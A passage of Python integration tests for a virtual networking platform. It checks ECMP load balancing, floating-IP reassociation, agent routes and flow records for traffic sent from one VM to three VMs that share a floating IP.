agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id5 = agent_vrf_obj['ucindex']
next_hops_in_tnl = inspect_hh.get_vna_active_route(
vrf_id=fvn_vrf_id5, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
for next_hop in next_hops_in_tnl:
if next_hop['type'] == 'Interface':
tap_intf_from_tnl = next_hop['itf']
tap_intf_list.append(tap_intf_from_tnl)
elif nh['type'] == 'Interface':
tap_intf = nh['itf']
tap_intf_list.append(tap_intf)
agent_tap_intf_list[vm_node_ip] = tap_intf_list
self.logger.info('The list of Tap interfaces from the agents are %s' %
agent_tap_intf_list)
# a_list= agent_tap_intf_list.values()
# result= all(x == a_list[0] for x in a_list)
#
# if result == True:
# self.logger.info('The Tap interface list is the same across agents')
# else:
# assert result, 'The Tap interface list across agents is incorrect'
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
sleep(10)
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream after disassociating ' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream after disassociating' % (
stream_sent_count[stream], stream_recv_count[stream])
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic again from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
time.sleep(10)
self.logger.info(
'Will re-associate the fip address from one of the VMs and check if ECMP holds ')
self.logger.info(
'There should be no packet loss in the traffic stream')
self.res.fip_obj.add_virtual_machine_interface(self.res.vm1_intf)
self.res.vnc_lib.floating_ip_update(self.res.fip_obj)
sleep(10)
self.logger.info(
'Get the FIP list again and verify the vrf_name and address in the VMI')
fip_addr_vm1 = self.res.vm1.chk_vmi_for_fip(self.res.vn1_fq_name)
fip_addr_vm2 = self.res.vm2.chk_vmi_for_fip(self.res.vn2_fq_name)
fip_addr_vm3 = self.res.vm3.chk_vmi_for_fip(self.res.vn3_fq_name)
fip_vrf_entry_vm1 = self.res.vm1.chk_vmi_for_vrf_entry(
self.res.vn1_fq_name)
fip_vrf_entry_vm2 = self.res.vm2.chk_vmi_for_vrf_entry(
self.res.vn2_fq_name)
fip_vrf_entry_vm3 = self.res.vm3.chk_vmi_for_vrf_entry(
self.res.vn3_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s, on %s is %s and on %s is %s' %
(self.res.vm1.vm_name, fip_vrf_entry_vm1, self.res.vm2.vm_name, fip_vrf_entry_vm2, self.res.vm3.vm_name, fip_vrf_entry_vm3))
if all(x == self.res.fvn_vrf_name for x in (fip_vrf_entry_vm1, fip_vrf_entry_vm2, fip_vrf_entry_vm3)):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s, to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2, vm3.vm_name, fip_addr_vm3))
if all(x == my_fip for x in (fip_addr_vm1, fip_addr_vm2, fip_addr_vm3)):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
self.logger.info('Check for the FIP route entry')
for vm_node_ip in vm_node_ips:
tap_intf_list = []
inspect_h9 = self.agent_inspect[vm_node_ip]
agent_vrf_objs = inspect_h9.get_vna_vrf_objs(domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id9 = agent_vrf_obj['ucindex']
paths = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list']
self.logger.info('There are %s nexthops to %s on Agent %s' %
(len(paths), self.res.my_fip, vm_node_ip))
next_hops = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
if not next_hops:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
for nh in next_hops:
label = nh['label']
if nh['type'] == 'Tunnel':
destn_agent = nh['dip']
inspect_hh = self.agent_inspect[destn_agent]
agent_vrf_objs = inspect_hh.get_vna_vrf_objs(
domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], self.res.fvn_vrf_name)
fvn_vrf_id5 = agent_vrf_obj['ucindex']
next_hops_in_tnl = inspect_hh.get_vna_active_route(
vrf_id=fvn_vrf_id5, ip=self.res.my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
for next_hop in next_hops_in_tnl:
if next_hop['type'] == 'Interface':
tap_intf_from_tnl = next_hop['itf']
tap_intf_list.append(tap_intf_from_tnl)
elif nh['type'] == 'Interface':
tap_intf = nh['itf']
tap_intf_list.append(tap_intf)
agent_tap_intf_list[vm_node_ip] = tap_intf_list
self.logger.info('The list of Tap interfaces from the agents are %s' %
agent_tap_intf_list)
# a_list= agent_tap_intf_list.values()
# result= all(x == a_list[0] for x in a_list)
#
# if result == True:
# self.logger.info('The Tap interface list is the same across agents')
# else:
# assert result, 'The Tap interface list across agents is incorrect'
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
sleep(10)
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream after associating the FIP address back' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream after associating the FIP address back' % (
stream_sent_count[stream], stream_recv_count[stream])
self.logger.info('Checking Flow Records')
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result = False
rev_flow_result1 = False
rev_flow_result2 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='6')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi2, protocol='6')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi3, protocol='6')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
else:
flow_result3 = flow_result3 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
dpi_list = [dpi1, dpi2, dpi3]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
rev_flow_result1 = True
rev_flow_result2 = True
rev_flow_result3 = True
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = rev_flow_result1 or False
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result2 = rev_flow_result2 or False
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result3 = rev_flow_result3 or False
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2)
assert flow_result3, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip_delete_add_fip
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip_incr_sport(self):
'''Test communication between three VMs who have borrowed the FIP from common FIP pool. Increment sport and have 3 flows setup.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 100)
self.logger.info(
'Starting the following UDP flows : %s:10000-->30.1.1.3, %s:11000-->30.1.1.3, %s:12000-->30.1.1.3' %
(fvn_vm1.vm_ip, fvn_vm1.vm_ip, fvn_vm1.vm_ip))
self.logger.info("-" * 100)
vm_list = []
vm_list = [vm1, vm2, vm3]
fvm_list = [fvn_vm1]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=unicode(10000), dport=dport1)
stream2 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=unicode(11000), dport=dport1)
stream3 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=unicode(12000), dport=dport1)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
recv_filename = 'recvudp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
for i in range(len(stream_list)):
profile[i] = {}
sender[i] = {}
count = count + 1
send_filename = 'sendudp_%s' % count
profile[i] = ContinuousProfile(stream=stream_list[i], chksum=True)
sender[i] = Sender(send_filename, profile[i],
tx_local_host, send_host, self.inputs.logger)
sender[i].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for i in range(len(stream_list)):
sender[i].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = 0
stream_recv_total_count = 0
stream_recv_count = {}
result = True
for i in range(len(stream_list)):
self.logger.info('%s packets sent in Stream_%s' %
(sender[i].sent, i))
if sender[i].sent == None:
sender[i].sent = 0
stream_sent_count = stream_sent_count + sender[i].sent
self.logger.info('Total %s packets sent out.' % stream_sent_count)
for stream in stream_list:
stream_recv_count[stream] = 0
for vm in vm_list:
if receiver[stream][vm].recv == None:
receiver[stream][vm].recv = 0
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
self.logger.info('%s packets received in Stream_%s' %
(stream_recv_count[stream], stream))
stream_recv_total_count = stream_recv_total_count + \
stream_recv_count[stream]
self.logger.info('Total %s packets received.' %
stream_recv_total_count)
if abs(stream_recv_total_count - stream_sent_count) < 5:
self.logger.info('No Packet Loss Seen')
else:
self.logger.info('Packet Loss Seen')
# Checking Flow Records
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result = False
rev_flow_result1 = False
rev_flow_result2 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=unicode(10000), dport=dpi1, protocol='17')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=unicode(11000), dport=dpi1, protocol='17')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=unicode(12000), dport=dpi1, protocol='17')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:10000 to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:10000 to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:11000 to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:11000 to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi2, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:12000 to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi3, vm_node_ip))
else:
flow_result3 = flow_result3 or False
self.logger.info('No Flow from %s:12000 to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi3, vm_node_ip))
dpi_list = [dpi1]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
rev_flow_result1 = True
rev_flow_result2 = True
rev_flow_result3 = True
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=unicode(10000), protocol='17')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=unicode(11000), protocol='17')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=unicode(12000), protocol='17')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = rev_flow_result1 or False
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result2 = rev_flow_result2 or False
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result3 = rev_flow_result3 or False
assert flow_result, 'Records for the flow between %s:%s and %s:10000 not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:11000 not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2)
assert flow_result3, 'Records for the flow between %s:%s and %s:12000 not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip_incr_sport
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip_incr_sip(self):
'''Test communication between three VMs who have borrowed the FIP from common FIP pool. Increment SIP and have 3 flows setup.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
fvn_vm2 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=self.res.fvn.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='fvn_vm2'))
assert fvn_vm2.verify_on_setup()
fvn_vm3 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=self.res.fvn.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='fvn_vm3'))
assert fvn_vm3.verify_on_setup()
fvm_list = [fvn_vm2, fvn_vm3]
for vm in fvm_list:
out = vm.wait_till_vm_is_up()
if out == False:
return {'result': out, 'msg': "%s failed to come up" % vm.vm_name}
else:
sleep(5)
self.logger.info('Installing Traffic package on %s ...' %
vm.vm_name)
vm.install_pkg("Traffic")
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 100)
self.logger.info(
'Starting the following UDP flows : %s-->30.1.1.3, %s-->30.1.1.3, %s-->30.1.1.3' %
(fvn_vm1.vm_ip, fvn_vm2.vm_ip, fvn_vm3.vm_ip))
self.logger.info("-" * 100)
vm_list = []
vm_list = [vm1, vm2, vm3]
fvm_list = [fvn_vm1, fvn_vm2, fvn_vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="udp", src=fvn_vm2.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream3 = Stream(protocol="ip", proto="udp", src=fvn_vm3.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = {}
tx_local_host = {}
send_host = {}
for fvm in fvm_list:
tx_vm_node_ip[fvm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvm.vm_obj)]['host_ip']
tx_local_host[fvm] = Host(
tx_vm_node_ip[fvm],
self.inputs.host_data[fvm.vm_node_ip]['username'],
self.inputs.host_data[fvm.vm_node_ip]['password'])
send_host[fvm] = Host(
fvm.local_ip, fvm.vm_username, fvm.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
recv_filename = 'recvudp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
for i in range(len(stream_list)):
profile[i] = {}
sender[i] = {}
count = count + 1
send_filename = 'sendudp_%s' % count
profile[i] = ContinuousProfile(stream=stream_list[i], chksum=True)
sender[i] = Sender(send_filename, profile[i], tx_local_host[
fvm_list[i]], send_host[fvm_list[i]], self.inputs.logger)
sender[i].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for i in range(len(stream_list)):
sender[i].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = 0
stream_recv_total_count = 0
stream_recv_count = {}
result = True
for i in range(len(stream_list)):
self.logger.info('%s packets sent in Stream_%s' %
(sender[i].sent, i))
if sender[i].sent == None:
sender[i].sent = 0
stream_sent_count = stream_sent_count + sender[i].sent
self.logger.info('Total %s packets sent out.' % stream_sent_count)
for stream in stream_list:
stream_recv_count[stream] = 0
for vm in vm_list:
if receiver[stream][vm].recv == None:
receiver[stream][vm].recv = 0
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
self.logger.info('%s packets received in Stream_%s' %
(stream_recv_count[stream], stream))
stream_recv_total_count = stream_recv_total_count + \
stream_recv_count[stream]
self.logger.info('Total %s packets received.' %
stream_recv_total_count)
if abs(stream_recv_total_count - stream_sent_count) < 5:
self.logger.info('No Packet Loss Seen')
else:
self.logger.info('Packet Loss Seen')
# Checking Flow Records
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result = False
rev_flow_result1 = False
rev_flow_result2 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id_1 = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
fvn_vrf_id_2 = fvn_vm2.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
fvn_vrf_id_3 = fvn_vm3.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id_1, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='17')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id_2, sip=fvn_vm2.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='17')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id_3, sip=fvn_vm3.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='17')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm2.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm2.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm3.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result3 = flow_result3 or False
